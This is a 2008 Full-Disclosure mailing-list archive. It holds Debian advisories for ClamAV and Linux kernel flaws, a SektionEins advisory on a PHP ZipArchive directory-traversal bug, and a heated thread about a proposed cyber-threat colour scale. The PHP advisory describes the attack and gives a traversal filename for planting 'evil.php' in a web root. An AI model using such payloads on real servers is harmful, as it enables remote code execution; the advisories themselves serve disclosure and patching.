<87r64os5w6.fsf@mid.deneb.enyo.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1680-1 security at debian.org http://www.debian.org/security/ Florian Weimer December 04, 2008 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : clamav Vulnerability : buffer overflow, stack consumption Problem type : local (remote) Debian-specific: no CVE Id(s) : CVE-2008-5050 CVE-2008-5314 Debian Bug : 505134 507624 Moritz Jodeit discovered that ClamAV, an anti-virus solution, suffers from an off-by-one-error in its VBA project file processing, leading to a heap-based buffer overflow and potentially arbitrary code execution (CVE-2008-5050). Ilja van Sprundel discovered that ClamAV contains a denial of service condition in its JPEG file processing because it does not limit the recursion depth when processing JPEG thumbnails (CVE-2008-5314). For the stable distribution (etch), these problems have been fixed in version 0.90.1dfsg-4etch16. For the unstable distribution (sid), these problems have been fixed in version 0.94.dfsg.2-1. The testing distribution (lenny) will be fixed soon. We recommend that you upgrade your clamav packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1dfsg.orig.tar.gz Size/MD5 checksum: 11610428 6dc18602b0aa653924d47316f9411e49 http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1dfsg-4etch16.dsc Size/MD5 checksum: 908 ebc60299a69aab41dfdb77e667e2857c http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1dfsg-4etch16.diff.gz Size/MD5 checksum: 216130 5ae1da1b6351a13b5c385919960ca9b7 Architecture independent packages: http://security.debian.org/pool/updates/main/c/clamav/clamav-base_0.90.1dfsg-4etch16_all.deb Size/MD5 checksum: 201408 63e3898029276baf914fafa347747996 http://security.debian.org/pool/updates/main/c/clamav/clamav-docs_0.90.1dfsg-4etch16_all.deb Size/MD5 checksum: 1003722 5d316f2ea821b441971b0e05e58e481d http://security.debian.org/pool/updates/main/c/clamav/clamav-testfiles_0.90.1dfsg-4etch16_all.deb Size/MD5 checksum: 158564 189a55ca25bdf9e03a0ae3b9f4a565e9 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1dfsg-4etch16_alpha.deb Size/MD5 checksum: 373052 b59a6787be52e776d3b6238bac4e7fff http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1dfsg-4etch16_alpha.deb Size/MD5 checksum: 182812 289769066d1883af6c455255725c1c81 http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1dfsg-4etch16_alpha.deb Size/MD5 checksum: 9305338 e2d5290afa1484ffc3ee6abfc99a7e5f http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1dfsg-4etch16_alpha.deb Size/MD5 checksum: 465410 ad42ee7f6355353575f05de54d67fa2b http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1dfsg-4etch16_alpha.deb Size/MD5 checksum: 598714 6f862583fe87d09e3c3a3c288c75a787 http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1dfsg-4etch16_alpha.deb Size/MD5 checksum: 180954 7122cfc98ec69b5b012d9794dc3f44cd http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1dfsg-4etch16_alpha.deb Size/MD5 checksum: 862390 df3cb4e88d62cbc641d1c48c14d5c551 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1dfsg-4etch16_amd64.deb Size/MD5 checksum: 856672 bc8b467814eb5b76b6a165ee7abbbb7d http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1dfsg-4etch16_amd64.deb Size/MD5 checksum: 177968 c2aa51b550584931f3f1b7b1f6df6508 http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1dfsg-4etch16_amd64.deb Size/MD5 checksum: 9302094 cd9f623cfb4f23d1777cf21e830d74b2 http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1dfsg-4etch16_amd64.deb Size/MD5 checksum: 355706 e0db968192096ac9215ab676b5750c7d http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1dfsg-4etch16_amd64.deb Size/MD5 checksum: 179200 99ba1e041488e76a7d6e457ed51536f0 http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1dfsg-4etch16_amd64.deb Size/MD5 checksum: 341684 6207bf783731c636eaa192d696466a88 http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1dfsg-4etch16_amd64.deb Size/MD5 checksum: 594608 5e87c000b193a1d25e03580496b91fc2 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1dfsg-4etch16_hppa.deb Size/MD5 checksum: 178252 a2dadc8689fd265609265d65f9ba5cf7 http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1dfsg-4etch16_hppa.deb Size/MD5 checksum: 178500 e26b37f74b35c6128654305c2d8f68eb http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1dfsg-4etch16_hppa.deb Size/MD5 checksum: 373174 c8815805d7a9cf555a1611b7314cbe93 http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1dfsg-4etch16_hppa.deb Size/MD5 checksum: 573090 724ad2d96fcd7b80e7a1c8c090fb9b04 http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1dfsg-4etch16_hppa.deb Size/MD5 checksum: 9303992 c463499f12992880b420a015b1bd5d9a http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1dfsg-4etch16_hppa.deb Size/MD5 checksum: 857738 1ebd69a77c29a7fc69f02b27b2dad3e6 http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1dfsg-4etch16_hppa.deb Size/MD5 checksum: 396534 d889914674f27507e6ca759d78d22995 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1dfsg-4etch16_i386.deb Size/MD5 checksum: 338494 19d7a1f5ba21bb2ea6ef65477559f94e http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1dfsg-4etch16_i386.deb Size/MD5 checksum: 9299810 7128061759b66acac727697fe89b64f1 http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1dfsg-4etch16_i386.deb Size/MD5 checksum: 176040 be3736249dbc666ba1319b1c90846f6c http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1dfsg-4etch16_i386.deb Size/MD5 checksum: 561386 c9d821e32d55ef4a6a2ff6c53dfe5144 http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1dfsg-4etch16_i386.deb Size/MD5 checksum: 855774 4d455d6519fb958ca80ccd64cf002733 http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1dfsg-4etch16_i386.deb Size/MD5 checksum: 173110 19bb9a435ec67992ec1f64117bbe4ad5 http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1dfsg-4etch16_i386.deb Size/MD5 checksum: 340104 febee614772fbd5bf27f05f121651a20 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1dfsg-4etch16_ia64.deb Size/MD5 checksum: 879178 e54e7a00d6997145abf9d0fd29125122 http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1dfsg-4etch16_ia64.deb Size/MD5 checksum: 611950 4688c0588b2c0289f7d1d1661afab75f http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1dfsg-4etch16_ia64.deb Size/MD5 checksum: 9316052 a7621f1da45dc360701bb220375f75fa http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1dfsg-4etch16_ia64.deb Size/MD5 checksum: 202432 97d25289436bab9657006c5a3111a46b http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1dfsg-4etch16_ia64.deb Size/MD5 checksum: 192686 f749efd1adaa69f02cf333b59c1f8fe0 http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1dfsg-4etch16_ia64.deb Size/MD5 checksum: 466144 808f94a059ba40b6fb07d9455d09f6aa http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1dfsg-4etch16_ia64.deb Size/MD5 checksum: 428106 1be6f7d9cdc26e37f306cf1b17d465ac mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1dfsg-4etch16_mips.deb Size/MD5 checksum: 179864 87927a28c832d9591e72b57949c1dc6e http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1dfsg-4etch16_mips.deb Size/MD5 checksum: 600956 8e9a4325b6fca6a1233fa9fd0ca0555c http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1dfsg-4etch16_mips.deb Size/MD5 checksum: 855252 f6e1334c499c80f63aed3d29e44ae1bf http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1dfsg-4etch16_mips.deb Size/MD5 checksum: 398728 e6cd9d013cc52be551eba54b2720b983 http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1dfsg-4etch16_mips.deb Size/MD5 checksum: 175734 a9282395129b667acb155dbcc2a0b93c http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1dfsg-4etch16_mips.deb Size/MD5 checksum: 343690 1c91c1d31700a461afc165781ae2f090 http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1dfsg-4etch16_mips.deb Size/MD5 checksum: 9301736 4bc34b6d01389eb060b31952c2b1b27b powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1dfsg-4etch16_powerpc.deb Size/MD5 checksum: 9303100 e98394d3111c5ff1c612fb3e92a0f8b9 http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1dfsg-4etch16_powerpc.deb Size/MD5 checksum: 857964 eda098ba91e370a95e9259b651fb684b http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1dfsg-4etch16_powerpc.deb Size/MD5 checksum: 177148 8b6840ca3ddf149b2dfa0c20112b63fd http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1dfsg-4etch16_powerpc.deb Size/MD5 checksum: 182514 e26515d0a92e205bca5d7e4438c51589 http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1dfsg-4etch16_powerpc.deb Size/MD5 checksum: 350804 ab54eeb5d022ae08535dd90c9b5df157 http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1dfsg-4etch16_powerpc.deb Size/MD5 checksum: 372856 999347aba8ba2a6481c33d0656aeaad3 http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1dfsg-4etch16_powerpc.deb Size/MD5 checksum: 592144 305ef279c3840eb9fb3df233ed258333 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1dfsg-4etch16_s390.deb Size/MD5 checksum: 177908 d4a05f341abba5d5de91e328d841518d http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1dfsg-4etch16_s390.deb Size/MD5 checksum: 177060 4762fb05719e9ce0cb1ed3cad9c57960 http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1dfsg-4etch16_s390.deb Size/MD5 checksum: 9301758 1bd5836e2d661378dfa9f4cf9f41091a http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1dfsg-4etch16_s390.deb Size/MD5 checksum: 370338 fa23bc8ee8d3f0d85b8b03d933398edb http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1dfsg-4etch16_s390.deb Size/MD5 checksum: 582564 a6ee552708c64b6d9dd0b891cc5fb797 http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1dfsg-4etch16_s390.deb Size/MD5 checksum: 361764 06046ba7e4a989592a2ccca18a6f04a1 http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1dfsg-4etch16_s390.deb Size/MD5 checksum: 855966 fab4913131e36fb3ee0619e516d60a41 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/c/clamav/libclamav2_0.90.1dfsg-4etch16_sparc.deb Size/MD5 checksum: 349588 6dfb12eb76d35c2d91ae4e6ff1d516e1 http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.90.1dfsg-4etch16_sparc.deb Size/MD5 checksum: 9298888 ec04c3d9ce44da80eeca6795d695d061 http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.90.1dfsg-4etch16_sparc.deb Size/MD5 checksum: 357982 cfade6599939f4f83038e5334eaa3a2d http://security.debian.org/pool/updates/main/c/clamav/clamav-dbg_0.90.1dfsg-4etch16_sparc.deb Size/MD5 checksum: 542512 ffedc011073a2e0b2028bc700361e949 http://security.debian.org/pool/updates/main/c/clamav/clamav_0.90.1dfsg-4etch16_sparc.deb Size/MD5 checksum: 852672 197bb1d08bea1ed5826bba231c54e99f http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.90.1dfsg-4etch16_sparc.deb Size/MD5 checksum: 174792 c7136015088cbdc0f3d74769b4c46efb http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.90.1dfsg-4etch16_sparc.deb Size/MD5 checksum: 172304 fc4153b27a708f0906ee7c041b67f81b These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iQEcBAEBAgAGBQJJN5PaAAoJEL97/wQC1SS+UDIH/1Afas/ow3ybjzlwatl2Jx2P p5yeVwblQCcIDjSj05m9pbPi2KTFpz+ng+/jVRVE1TEcUZngC7aKh4pzV5WJMdSp gonrUF5APIMJpojRDTY07WNV41dxdCRlhpgNRaM62moHWpP8BtbQf9Wodl4vafZp S3OoToXaXs2VBGR6V0aJPvRU8StJI0FyUiboHYb9TLKP2k94RufydmZ3NaZaPluC sDkQ3gfbFDWiRqvcBBqWVBfvbkYHMy5U5/rpWd8uWHfiP9VlXJXd7Wk3cXkgOTgX aPPb/3qnb96GIN26ZQI+Y1seFfmaHk3roTcSPDk6Mb5bZjEtF7/4TXsBumWv2RQ= =3Dhc -----END PGP SIGNATURE----- From stefan.esser at sektioneins.de Thu Dec 4 07:39:36 2008 From: stefan.esser at sektioneins.de (Stefan Esser) Date: Thu, 4 Dec 2008 08:39:36 +0100 Subject: [Full-disclosure] Advisory 06/2008: PHP ZipArchive::extractTo() Directory Traversal Vulnerability Message-ID: <20081204073936.GA2323@hardened-php.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SektionEins GmbH www.sektioneins.de -= Security Advisory =- Advisory: PHP ZipArchive::extractTo() Directory Traversal Vulnerability Release Date: 2008/12/04 Last Modified: 2008/12/04 Author: Stefan Esser [stefan.esser[at]sektioneins.de] Application: PHP 5 <= 5.2.6 Severity: PHP applications using ZipArchive::extractTo() to unpack zip archive files can be tricked to overwrite arbitrary files writable by the webserver which might result in PHP remote code execution Risk: Medium Vendor Status: Vendor has released PHP 5.2.7 which contains an updated ZipArchive::extractTo() method that flattens the filename stored inside zip archives before unpacking Reference: http://www.sektioneins.de/advisories/SE-2008-06.txt Overview: Quote from http://www.php.net "PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML." PHP comes with the zip extension that provides the ZipArchive class for zip archive manipulation. During an audit of a large scale PHP applications that uses ZipArchive::extractTo() to unpack user uploaded zip archives to temporary directories it was discovered that ZipArchive::extractTo() does not flatten the filenames stored inside the zip archives. Therefore it is possible to create zip archives containing relative filenames that when unpacked will create or overwrite files outside of the temporary directory. In the applications like the one in question this results in a remote PHP code execution vulnerability, because we are able to drop new PHP files in writable directories within the webserver's document root directory. Details: No details required. To exploit this an attacker just needs to create a zip archive containing filenames like ../../../../../../../../../../../var/www/wr_dir/evil.php An easy way to achieve that is to just store a file with a long name inside the zip archive and then change it with a hex editor Proof of Concept: SektionEins GmbH is not going to release a proof of concept exploit for this vulnerability. Disclosure Timeline: 23. June 2008 - Notified security at php.net 04. December 2008 - PHP developers released PHP 5.2.7 04. December 2008 - Public Disclosure Recommendation: It is recommended to upgrade to the latest version of PHP which also fixes additional vulnerabilities reported by third parties. Grab your copy at: http://www.php.net/get/php-5.2.7.tar.bz2/from/a/mirror CVE Information: The Common Vulnerabilities and Exposures project (cve.mitre.org) has not assigned a name to this vulnerability yet. GPG-Key: pub 1024D/15ABDA78 2004-10-17 Stefan Esser Key fingerprint = 7806 58C8 CFA8 CE4A 1C2C 57DD 4AE1 795E 15AB DA78 Copyright 2008 SektionEins GmbH. All rights reserved. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.8 (Darwin) iEYEARECAAYFAkk3qT4ACgkQSuF5XhWr2nho0QCgi6JABGlJUbf7Z3eR61J7KQMH JhoAnRBzGsfci/OsDBEVtv+UBE2UZ+I1 =X9Yi -----END PGP SIGNATURE----- From rysheve at gmail.com Thu Dec 4 15:03:22 2008 From: rysheve at gmail.com (Chris Jeane) Date: Thu, 4 Dec 2008 09:03:22 -0600 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: <49375527.3070804@clusterbee.net> References: <20081202192922.62A6C118041@smtp.hushmail.com> <49375527.3070804@clusterbee.net> Message-ID: The Project Chroma Project website reads(I have highlighted the colors in black so that they are readable): *Green level: There is negligible threat to online security. *Ok this one is pretty simple.* Yellow level : There is a minimal level of threat, and this must be monitored and contained. *The SAN ISC says : "We are currently *tracking* a significant new threat. The impact is either unknown or expected to be minor to the infrastructure. However, local impact could be significant. Users are advised to take immediate specific *action to contain* the impact." You are giving an abbreviation version of something that already exists and is excepted. *Orange level: This level of threat indicates there are parties who are actively engaging in cyber-warfare. Caution is required when online. *Caution is *always* required when online. If you are in an area (country/province/region) that is affected by cyber attacks you will have limited/no access the internet. If only your company/person is being assaulted from cyberspace the attack would probably go unnoticed by this monitoring system. If the attackers were commiting a DDOS attack on several specific non-infastructure targets, you internet access my slow/go dark, but is that really a threat to you? or one you can protect agianst? *Red level: This level indicates a full blown cyber-war. It indicates very high probability of all communications being intercepted. *The use of the term 'full blown cyber-war' seems like a overarching scare tactic. We have yet to see what cyber-warfare looks like. Estonia was a one sided cyber ambush, not two entites engaging in war. The alerts should be more generic and accompanied by an acessment of the actual *current *situation. If something like 'Code Red' where to infect the internet agian this alert calling it cyber-war would be a misnomer.* While homeland security's implementation does not seem to have a real world merit, such a threat level would certainly be very useful in the online security realm. *Who is this useful to: Security processionals, end users, governmental agencies? How and why as similar systems already exist?* Please disseminate this announcement of the project Chroma levels for online security. The immediate mission of the project is to be picked up by the antivirus and security tools vendors, so as to add the color codes to their products and provide users with a tangible measure of their online security. *Yellow is not a tangible measure of their online security. If perhaps an Online Security/IPS package knew that a DDoS attack was coming for an address segment of the internet and it requested that I block traffic from those attackers until an all clear or *Green * status was given.* *That is tangible and actionable.* Current status: Threat level Yellow.* Your current is higher than SANS ISC. Do you know something they don't? On Wed, Dec 3, 2008 at 9:57 PM, Luke Scharf wrote: > Mike C wrote: > >> If you really want to change state of security for the n00bs, > >> spread the knowledge, not the colors. > >> > >> > > Thats what project Chroma is all about.. Are you on board?! > > > > This already exists, backed up by some hard-core security competence: > http://isc.sans.org/infocon.html > http://isc.sans.org/ > > Has it changed the world? > > -Luke > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081204/ee6f58d5/attachment.html From kz20fl at googlemail.com Thu Dec 4 15:15:21 2008 From: kz20fl at googlemail.com (James Rankin) Date: Thu, 4 Dec 2008 15:15:21 +0000 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: References: <20081202192922.62A6C118041@smtp.hushmail.com> <49375527.3070804@clusterbee.net> Message-ID: <8826b4700812040715x662acd8i6c54229892e039a9@mail.gmail.com> "full-blown cyber war" This indicates that Mike C is N3tN00b, and is also about to join him on the spam filter. Flame away, cos I won't hear you Mike/N3tty 2008/12/4 Chris Jeane > The Project Chroma Project website reads(I have highlighted the colors in > black so that they are readable): > > *Green level: There is negligible threat to online security. > * > Ok this one is pretty simple.* > > Yellow level : There is a minimal level of threat, and this must be > monitored and contained. > * > The SAN ISC says : "We are currently *tracking* a significant new threat. > The impact is either unknown or expected to be minor to the infrastructure. > However, local impact could be significant. Users are advised to take > immediate specific *action to contain* the impact." > You are giving an abbreviation version of something that already exists and > is excepted. > > *Orange level: This level of threat indicates there are parties who are > actively engaging in cyber-warfare. Caution is required when online. > * > Caution is *always* required when online. If you are in an area > (country/province/region) that is affected by cyber attacks you will have > limited/no access the internet. If only your company/person is being > assaulted from cyberspace the attack would probably go unnoticed by this > monitoring system. If the attackers were commiting a DDOS attack on several > specific non-infastructure targets, you internet access my slow/go dark, but > is that really a threat to you? or one you can protect agianst? > > *Red level: This level indicates a full blown cyber-war. It indicates > very high probability of all communications being intercepted. > * > The use of the term 'full blown cyber-war' seems like a overarching scare > tactic. We have yet to see what cyber-warfare looks like. Estonia was a one > sided cyber ambush, not two entites engaging in war. The alerts should be > more generic and accompanied by an acessment of the actual *current *situation. > If something like 'Code Red' where to infect the internet agian this alert > calling it cyber-war would be a misnomer.* > > While homeland security's implementation does not seem to have a real > world merit, such a threat level would certainly be very useful in the > online security realm. > * > Who is this useful to: Security processionals, end users, governmental > agencies? How and why as similar systems already exist?* > > Please disseminate this announcement of the > project Chroma levels for online security. The immediate mission of > the project is to be picked up by the antivirus and security tools > vendors, so as to add the color codes to their products and provide > users with a tangible measure of their online security. > * > Yellow is not a tangible measure of their online security. If perhaps an > Online Security/IPS package knew that a DDoS attack was coming for an > address segment of the internet and it requested that I block traffic from > those attackers until an all clear or *Green * > status was given.* *That is tangible and actionable.* > > Current status: Threat level Yellow.* > Your current is higher than SANS ISC. Do you know something they don't? > > On Wed, Dec 3, 2008 at 9:57 PM, Luke Scharf wrote: > >> Mike C wrote: >> >> If you really want to change state of security for the n00bs, >> >> spread the knowledge, not the colors. >> >> >> >> >> > Thats what project Chroma is all about.. Are you on board?! >> > >> >> This already exists, backed up by some hard-core security competence: >> http://isc.sans.org/infocon.html >> http://isc.sans.org/ >> >> Has it changed the world? >> >> -Luke >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081204/8483344d/attachment.html From Valdis.Kletnieks at vt.edu Thu Dec 4 16:27:05 2008 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Thu, 04 Dec 2008 11:27:05 -0500 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: Your message of "Wed, 03 Dec 2008 21:57:27 CST." <49375527.3070804@clusterbee.net> References: <20081202192922.62A6C118041@smtp.hushmail.com> <49375527.3070804@clusterbee.net> Message-ID: <34334.1228408025@turing-police.cc.vt.edu> On Wed, 03 Dec 2008 21:57:27 CST, Luke Scharf said: > This already exists, backed up by some hard-core security competence: > http://isc.sans.org/infocon.html > http://isc.sans.org/ > > Has it changed the world? The most useful aspect of the SANS color meter is the fact that when it changes, they *also* publish an in-depth article about the threat that made them change the level. So you as a security professional can say "Wow, the meter just flickered, I better go read the latest and act on it..." Note the last 4 words there. That's the distinction between a useful service and a color-du-jour marker - actionable information. Or you can just point your favorite RSS reader at the article feed: http://isc.sans.org/diary.html?rss and have *it* chirp at you when there's a new article. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081204/950016f7/attachment.bin From razishaban at gmail.com Thu Dec 4 16:36:55 2008 From: razishaban at gmail.com (Razi Shaban) Date: Thu, 4 Dec 2008 18:36:55 +0200 Subject: [Full-disclosure] Project Chroma: A color code for the state ofcyber security In-Reply-To: References: <20081202192922.62A6C118041@smtp.hushmail.com> <49375527.3070804@clusterbee.net> Message-ID: <2d792fb20812040836r7746afdahf5ab892579069878@mail.gmail.com> On Thu, Dec 4, 2008 at 5:03 PM, Chris Jeane wrote: > The Project Chroma Project website reads(I have highlighted the colors in > black so that they are readable): > > Levels crap > On Thu, Dec 4, 2008 at 6:28 PM, Razi Shaban wrote: > On Thu, Dec 4, 2008 at 6:02 PM, Chris Jeane wrote: >> Exactly. Which is why there is a need of a system that contains more >> information and less cookie cutter levels. We still don't know what a >> cyber-war looks like. One country could attack the transport/power systems >> of a third party that supplies/supports their target. This is all >> hypothetical, but there is a high probability of collateral damage. >> > > You misunderstood me. What I was getting at is that your ideas, > including a "cyber-war" and all this leveling, show that you are about > as uninformed as n3td3v. Please take your nub spam somewhere else. > > -- > Razi Shaban > To explain the idea of leveling: The internet is a gigantic place. No matter when and from where you connect, it is out to get you, you individually. Also, large-scale cyber wars are a constant thing. I am aware of three very large-scale wars taking place at the moment, does that increase or decrease the risk any user would be taking by accessing the internet? Of course not. The concept of basing a levelling system on a few organized national or private attempts to do something or another is ridiculous; the Estonian attack compromised less than 0.0001% of all cyber attacks during that time period. The matter of the fact is, attempting to take the hugely complex and intricate dark side of the internet and summarize it in a color level is absurd. In fact, attempting to summarize it at all is ridiculous. Summarizing implies that you know everything about the topic. Anyone trying to summarize this knows nothing when he/she realizes the vastness of the internet. tl;dr : attempting to summarize the internet is less fruitful than throwing ice cubes at the sun, but it requires much lesser intelligence to do the first. -- Razi Shaban From dannf at debian.org Thu Dec 4 17:59:11 2008 From: dannf at debian.org (dann frazier) Date: Thu, 4 Dec 2008 10:59:11 -0700 Subject: [Full-disclosure] [SECURITY] [DSA 1681-1] New Linux 2.6.24 packages fix several vulnerabilities Message-ID: <20081204175911.GG14564@ldl.fc.hp.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ---------------------------------------------------------------------- Debian Security Advisory DSA-1681-1 security at debian.org http://www.debian.org/security/ Dann Frazier, Alexander Prinsier December 04, 2008 http://www.debian.org/security/faq - ---------------------------------------------------------------------- Package : linux-2.6.24 Vulnerability : denial of service/privilege escalation Problem type : local/remote Debian-specific: no CVE Id(s) : CVE-2008-3528 CVE-2008-4554 CVE-2008-4576 CVE-2008-4618 CVE-2008-4933 CVE-2008-4934 CVE-2008-5025 CVE-2008-5029 CVE-2008-5134 CVE-2008-5182 CVE-2008-5300 Several vulnerabilities have been discovered in the Linux kernel that may lead to a denial of service or privilege escalation. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2008-3528 Eugene Teo reported a local DoS issue in the ext2 and ext3 filesystems. Local users who have been granted the privileges necessary to mount a filesystem would be able to craft a corrupted filesystem that causes the kernel to output error messages in an infinite loop. CVE-2008-4554 Milos Szeredi reported that the usage of splice() on files opened with O_APPEND allows users to write to the file at arbitrary offsets, enabling a bypass of possible assumed semantics of the O_APPEND flag. CVE-2008-4576 Vlad Yasevich reported an issue in the SCTP subsystem that may allow remote users to cause a local DoS by triggering a kernel oops. CVE-2008-4618 Wei Yongjun reported an issue in the SCTP subsystem that may allow remote users to cause a local DoS by triggering a kernel panic. CVE-2008-4933 Eric Sesterhenn reported a local DoS issue in the hfsplus filesystem. Local users who have been granted the privileges necessary to mount a filesystem would be able to craft a corrupted filesystem that causes the kernel to overrun a buffer, resulting in a system oops or memory corruption. CVE-2008-4934 Eric Sesterhenn reported a local DoS issue in the hfsplus filesystem. Local users who have been granted the privileges necessary to mount a filesystem would be able to craft a corrupted filesystem that results in a kernel oops due to an unchecked return value. CVE-2008-5025 Eric Sesterhenn reported a local DoS issue in the hfs filesystem. Local users who have been granted the privileges necessary to mount a filesystem would be able to craft a filesystem with a corrupted catalog name length, resulting in a system oops or memory corruption. CVE-2008-5029 Andrea Bittau reported a DoS issue in the unix socket subsystem that allows a local user to cause memory corruption, resulting in a kernel panic. CVE-2008-5134 Johannes Berg reported a remote DoS issue in the libertas wireless driver, which can be triggered by a specially crafted beacon/probe response. CVE-2008-5182 Al Viro reported race conditions in the inotify subsystem that may allow local users to acquire elevated privileges. CVE-2008-5300 Dann Frazier reported a DoS condition that allows local users to cause the out of memory handler to kill off privileged processes or trigger soft lockups due to a starvation issue in the unix socket subsystem. For the stable distribution (etch), these problems have been fixed in version 2.6.24-6~etchnhalf.7. We recommend that you upgrade your linux-2.6.24 packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: 